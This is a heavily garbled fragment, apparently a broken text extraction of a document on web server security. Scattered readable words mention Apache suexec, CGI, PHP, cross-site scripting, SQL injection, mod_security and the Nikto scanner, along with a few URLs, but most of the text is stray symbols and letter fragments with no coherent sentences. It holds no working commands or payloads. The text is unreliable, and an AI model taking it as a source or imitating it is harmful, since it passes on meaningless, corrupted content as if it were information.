HTTP://HTTPD.APACHE.ORG/DOCS-2.0/SUEXEC.HTML
) CGI-BIN
% <
,
MR/$
5 e 'j 4
6
. W L3
#
5
("c
…
("c ) ( E 6
#
PHP "
) -
z 3 1 2
B / " S1:
a
0
HTTP HEADER
F
- < W L3 2
7 !89 K ;!
SAFE 1/
h @ " ?
W
l '\ X
L3 2
23
5 )
K6
PHP
25
4
C
'
4 ? 5 TG' g…
F " ? 59 T L/…
B5# 7
!89
'
HTTP://WWW.SECURITYFOCUS.COM/PRINTABLE/INFOCUS/1706
T)„
8Q 0
G X)
XSS:CROSS SITE
" ?
W L3 2
P
%
I
'X
)
…
MOD_SECURITY
DY/ ; ! ,
B5# 7 !89 -,6
1
)„ " - Y
0 < SCRIPTING
<@
0 5 - Y HTTP://MODSECURITY.ORG/ h @
SQL INJECTION &XSS % < R 4 S @ ^
( 0 5 - Y
h @
2 P
h
,G
6
6 & " ?
:
) &5 …
0
56 &K/ &
H]NIKTO &
%
"
2
#
'
# _HTTP://WWW.CIRT.NET/CODE/NIKTO.SHTML
0
CGI
) j 4
6&
V'
]
>#
